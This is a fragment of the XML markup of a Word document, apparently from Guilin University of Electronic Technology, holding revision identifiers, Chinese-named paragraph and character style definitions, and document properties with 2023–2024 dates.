    <w:rsid w:val="00DC63B5"/>
    <w:rsid w:val="00DC6EE0"/>
    <w:rsid w:val="00DD0725"/>
    <w:rsid w:val="00DD5CB6"/>
    <w:rsid w:val="00DD70F6"/>
    <w:rsid w:val="00DE3474"/>
    <w:rsid w:val="00DE4690"/>
    <w:rsid w:val="00DE48B1"/>
    <w:rsid w:val="00DF2CAD"/>
    <w:rsid w:val="00E01287"/>
    <w:rsid w:val="00E02CE2"/>
    <w:rsid w:val="00E06C40"/>
    <w:rsid w:val="00E1347F"/>
    <w:rsid w:val="00E16A2E"/>
    <w:rsid w:val="00E21E97"/>
    <w:rsid w:val="00E22A09"/>
    <w:rsid w:val="00E237C1"/>
    <w:rsid w:val="00E25EB2"/>
    <w:rsid w:val="00E25EFC"/>
    <w:rsid w:val="00E332FC"/>
    <w:rsid w:val="00E361D6"/>
    <w:rsid w:val="00E363F3"/>
    <w:rsid w:val="00E37A36"/>
    <w:rsid w:val="00E42318"/>
    <w:rsid w:val="00E43E36"/>
    <w:rsid w:val="00E52055"/>
    <w:rsid w:val="00E523F3"/>
    <w:rsid w:val="00E66D3F"/>
    <w:rsid w:val="00E67868"/>
    <w:rsid w:val="00E7206A"/>
    <w:rsid w:val="00E75078"/>
    <w:rsid w:val="00E76AD9"/>
    <w:rsid w:val="00E801C6"/>
    <w:rsid w:val="00E825C1"/>
    <w:rsid w:val="00E83A74"/>
    <w:rsid w:val="00E84947"/>
    <w:rsid w:val="00E959E6"/>
    <w:rsid w:val="00E95AF4"/>
    <w:rsid w:val="00E963A5"/>
    <w:rsid w:val="00EA0D8C"/>
    <w:rsid w:val="00EA7B03"/>
    <w:rsid w:val="00EA7C10"/>
    <w:rsid w:val="00EB2EA7"/>
    <w:rsid w:val="00EB37AB"/>
    <w:rsid w:val="00EB4B04"/>
    <w:rsid w:val="00EC1DA9"/>
    <w:rsid w:val="00EC6B2C"/>
    <w:rsid w:val="00EC6D00"/>
    <w:rsid w:val="00ED14CD"/>
    <w:rsid w:val="00ED375C"/>
    <w:rsid w:val="00ED74F3"/>
    <w:rsid w:val="00EE55DE"/>
    <w:rsid w:val="00EE684E"/>
    <w:rsid w:val="00EF3937"/>
    <w:rsid w:val="00EF7629"/>
    <w:rsid w:val="00F0178F"/>
    <w:rsid w:val="00F03D1C"/>
    <w:rsid w:val="00F0520A"/>
    <w:rsid w:val="00F14475"/>
    <w:rsid w:val="00F214C1"/>
    <w:rsid w:val="00F32B28"/>
    <w:rsid w:val="00F33D56"/>
    <w:rsid w:val="00F341DA"/>
    <w:rsid w:val="00F44EBC"/>
    <w:rsid w:val="00F529CD"/>
    <w:rsid w:val="00F52F9E"/>
    <w:rsid w:val="00F549B0"/>
    <w:rsid w:val="00F556F7"/>
    <w:rsid w:val="00F5587D"/>
    <w:rsid w:val="00F604F8"/>
    <w:rsid w:val="00F61DCE"/>
    <w:rsid w:val="00F7041B"/>
    <w:rsid w:val="00F75460"/>
    <w:rsid w:val="00F762FE"/>
    <w:rsid w:val="00F779D2"/>
    <w:rsid w:val="00F8395B"/>
    <w:rsid w:val="00F85C7B"/>
    <w:rsid w:val="00F86944"/>
    <w:rsid w:val="00F90263"/>
    <w:rsid w:val="00F92CB1"/>
    <w:rsid w:val="00F9598F"/>
    <w:rsid w:val="00F95DF3"/>
    <w:rsid w:val="00FA61EE"/>
    <w:rsid w:val="00FB0218"/>
    <w:rsid w:val="00FB33F3"/>
    <w:rsid w:val="00FC1150"/>
    <w:rsid w:val="00FC150C"/>
    <w:rsid w:val="00FC7098"/>
    <w:rsid w:val="00FD3BAC"/>
    <w:rsid w:val="00FD4FD1"/>
    <w:rsid w:val="00FD7574"/>
    <w:rsid w:val="00FE27ED"/>
    <w:rsid w:val="00FE7FA2"/>
    <w:rsid w:val="01027C35"/>
    <w:rsid w:val="03201783"/>
    <w:rsid w:val="07291D1F"/>
    <w:rsid w:val="07FD25E9"/>
    <w:rsid w:val="09D71932"/>
    <w:rsid w:val="0A414AA3"/>
    <w:rsid w:val="0BC719B7"/>
    <w:rsid w:val="0C822B95"/>
    <w:rsid w:val="0FF46D31"/>
    <w:rsid w:val="19BC2312"/>
    <w:rsid w:val="1AF070C2"/>
    <w:rsid w:val="1B59326E"/>
    <w:rsid w:val="20BB71C5"/>
    <w:rsid w:val="210C6647"/>
    <w:rsid w:val="250A5BD3"/>
    <w:rsid w:val="251F6DAA"/>
    <w:rsid w:val="26472FBE"/>
    <w:rsid w:val="273232E2"/>
    <w:rsid w:val="2EAF7F2B"/>
    <w:rsid w:val="2FB1304E"/>
    <w:rsid w:val="31AE7611"/>
    <w:rsid w:val="3200565F"/>
    <w:rsid w:val="346F2D8B"/>
    <w:rsid w:val="362E4BCB"/>
    <w:rsid w:val="39EE7A9E"/>
    <w:rsid w:val="3D860681"/>
    <w:rsid w:val="3EC4356E"/>
    <w:rsid w:val="40204729"/>
    <w:rsid w:val="40456516"/>
    <w:rsid w:val="46477E5A"/>
    <w:rsid w:val="477B49D4"/>
    <w:rsid w:val="4AEA46D0"/>
    <w:rsid w:val="4B1E1C29"/>
    <w:rsid w:val="50794E98"/>
    <w:rsid w:val="50CB25D1"/>
    <w:rsid w:val="511F668B"/>
    <w:rsid w:val="51801923"/>
    <w:rsid w:val="54C47921"/>
    <w:rsid w:val="59C72445"/>
    <w:rsid w:val="5ACB7D46"/>
    <w:rsid w:val="5B655636"/>
    <w:rsid w:val="5BB82905"/>
    <w:rsid w:val="5FE834C1"/>
    <w:rsid w:val="6095713B"/>
    <w:rsid w:val="61356FED"/>
    <w:rsid w:val="61784A20"/>
    <w:rsid w:val="65A417D5"/>
    <w:rsid w:val="670C3D41"/>
    <w:rsid w:val="68F4103E"/>
    <w:rsid w:val="6A132A85"/>
    <w:rsid w:val="6AB56AA1"/>
    <w:rsid w:val="6C333849"/>
    <w:rsid w:val="6D201119"/>
    <w:rsid w:val="6DC7444F"/>
    <w:rsid w:val="6DEE4FE9"/>
    <w:rsid w:val="6EFD1979"/>
    <w:rsid w:val="6F7522D2"/>
    <w:rsid w:val="72606732"/>
    <w:rsid w:val="76B074FE"/>
    <w:rsid w:val="793869C2"/>
    <w:rsid w:val="795E2415"/>
    <w:rsid w:val="7A5073DE"/>
    <w:rsid w:val="7D0B25B3"/>
    <w:rsid w:val="7F9E09FD"/>
    <w:rsid w:val="7FF05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008F05"/>
  <w15:docId w15:val="{84695C44-3EC2-4AD5-A84F-E7E8FEF67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Preformatted" w:qFormat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semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia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qFormat/>
    <w:rPr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link w:val="aa"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60" w:line="312" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"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eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"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4"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="ad"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ae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basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ad">
    <w:name w:val="标题 字符"/>
    <w:link w:val="ac"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aa">
    <w:name w:val="副标题 字符"/>
    <w:link w:val="a9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="页脚 字符"/>
    <w:link w:val="a5"/>
    <w:qFormat/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="标题 1 Char"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTML0">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:link w:val="HTML"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:link w:val="1"/>
    <w:qFormat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a8">
    <w:name w:val="页眉 字符"/>
    <w:link w:val="a7"/>
    <w:qFormat/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99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customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:qFormat/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="1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13</Pages>
  <Words>462</Words>
  <Characters>2635</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>21</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>CHINA</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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桂林电子科技大学</dc:title>
  <dc:creator>USER</dc:creator>
  <cp:lastModifiedBy>霖汕 陈</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-05T13:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-23T01:49:00Z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AAEB6DB1F761426BBF9AE0C7BDAD2449</vt:lpwstr>
  </property>
</Properties>
</file>